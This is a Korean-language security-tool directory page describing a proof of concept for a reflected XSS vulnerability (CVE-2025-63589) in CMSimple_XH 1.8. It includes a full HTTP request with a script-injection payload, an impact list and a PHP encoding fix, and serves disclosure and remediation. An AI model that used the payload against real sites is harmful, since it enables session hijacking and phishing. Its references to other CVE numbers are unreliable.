Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-63589 — CMSimple_XH 1.8의 반사형 XSS 개념 증명으로, 인증되지 않은 스크립트 삽입이 정화되지 않은 경로 세그먼트를 통해 발생하며, CVSS 6.1 점수 및 PHP 수정 예제를 포함합니다. | Kitploit
도구/GitHubGitHub/cybercrewinc/cve-2025-63589
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubcybercrewinc/cve-2025-63589

CVE-2025-63589

CMSimple_XH 1.8의 반사형 XSS 개념 증명으로, 인증되지 않은 스크립트 삽입이 정화되지 않은 경로 세그먼트를 통해 발생하며, CVSS 6.1 점수 및 PHP 수정 예제를 포함합니다.

저장소 보기
110개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-63589 CMSimple_XH index.php 경로 처리에서의 Reflected XSS

발견일: 2025년 10월 6일
제품: CMSimple_XH (오픈소스 플랫 파일 CMS)
영향 받는 버전: 1.8 CVE: CVE-2025-63589 인증 필요: 없음 (비인증)
공격 유형: 반사형 크로스 사이트 스크립팅 (XSS)
예상 CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medium)

index.php의 프론트 컨트롤러는 동적 경로 세그먼트(템플릿/페이지 라우팅에 사용됨)를 수락하고 해당 값을 템플릿 렌더링에 전달합니다. 코드는 이러한 경로 세그먼트를 속성 및 앵커 href에 삽입하기 전에 제대로 살균하거나 HTML 인코딩하지 않습니다. 결과적으로 ">와 같은 문자와 주입된 태그(예: <script>...</script>)를 포함하는 특수하게 조작된 요청 URI가 HTML 출력에 그대로 반사되어 브라우저에서 실행됩니다.

일반적인 반사 지점은 다음과 같습니다:

  • 폼 action 속성 (예: 로그인/검색 폼)
  • 내비게이션/메뉴 항목 href 속성
  • 이동 경로 / 로케이터 내비게이션 (<nav class="locator">)
  • 바닥글 링크 (인쇄 보기, 사이트맵, 로그인 등)
  • 입력이 HTML 속성 컨텍스트 및 앵커 콘텐츠 내부에 위치하기 때문에 표준 속성 인코딩이 필요하지만 누락되었습니다.

    개념 증명 (PoC)

    요청:

    root@kitploit:~
    POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
    Host: 192.168.98.129:8080
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Origin: http://192.168.98.129:8080
    Upgrade-Insecure-Requests: 1
    Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
    Sec-CH-UA-Platform: "Windows"
    Sec-CH-UA-Mobile: ?0
    Content-Length: 32
    
    search=Search...&function=search
    
    Pasted image 20251006203832

    응답:

    Pasted image 20251006203959
    Pasted image 20251006204254

    주입된 페이로드 gjtqw"><script>alert(1)</script>co2cu가 메뉴 링크, 이동 경로, 검색 폼 액션 및 바닥글 링크에 인코딩되지 않고 반사되어, 페이지가 렌더링될 때 스크립트가 실행됩니다.

    action 속성을 안전하게 출력하기 위한 PHP 예제:

    root@kitploit:~
    $safe_segment = rawurlencode($segment);              // path-safety
    $action = '/cmsimplexh/index.php/' . $safe_segment;
    echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
    

    영향

    • 클라이언트 측 코드 실행 (피해자 브라우저에서 임의 JS 실행)
    • 정보 유출 (DOM 읽기, 클라이언트 접근 가능한 쿠키/토큰 유출)
    • 세션 하이재킹 / 가장 (세션 토큰이 JS에 접근 가능한 경우, HttpOnly 아님)
    • UI 스푸핑 / 피싱 (가짜 로그인 프롬프트 또는 가짜 페이지 렌더링)
    • 강제 작업 (피해자의 인증된 세션을 사용하여 수행)

    크레딧

    할당된 CVE:CVE-2025-63589

    https://nvd.nist.gov/vuln/detail/CVE-2025-63588

    발견자:株式会社CyberCrew / サイバークル

    참고 자료

    https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php

    https://nvd.nist.gov/vuln/detail/CVE-2025-24576


    ✉️ 문의처

    질문이나 상담이 있으시면 편하게 연락해 주세요.


    🏢 株式会社CyberCrew

    G1@4x

    📞 전화: 03-6853-5823
    📧 메일: [email protected]


    📄 회사 개요

    항목내용
    회사명株式会社CyberCrew
    주소도쿄도 지요다구 소토칸다 1-18-13 아키하바라 다이빌 6층

    🔐 주요 서비스

    🛡️ 보안 진단 및 위험 평가

    조직의 취약점을 다각도로 분석하고 최적의 개선 방안을 제안합니다.

    💻 침투 테스트

    표적형, 시나리오형, LLM 펜테스트까지 대응.

    🌒 다크웹 모니터링

    기밀 정보 유출을 조기에 탐지하고 신속하게 대응합니다.

    🎯 RED팀 훈련 및 사회공학

    실전적인 공격 시나리오에 기반한 방어력 평가를 실시합니다.

    🧠 보안 시스템 설계 및 컨설팅

    개발 초기 단계부터 보안을 고려한 설계를 지원합니다.


    🌐 공식 사이트: https://www.cybercrew.co.jp
    🕒 CyberCrew — 신뢰할 수 있는 보안 파트너.

    도구 다운로드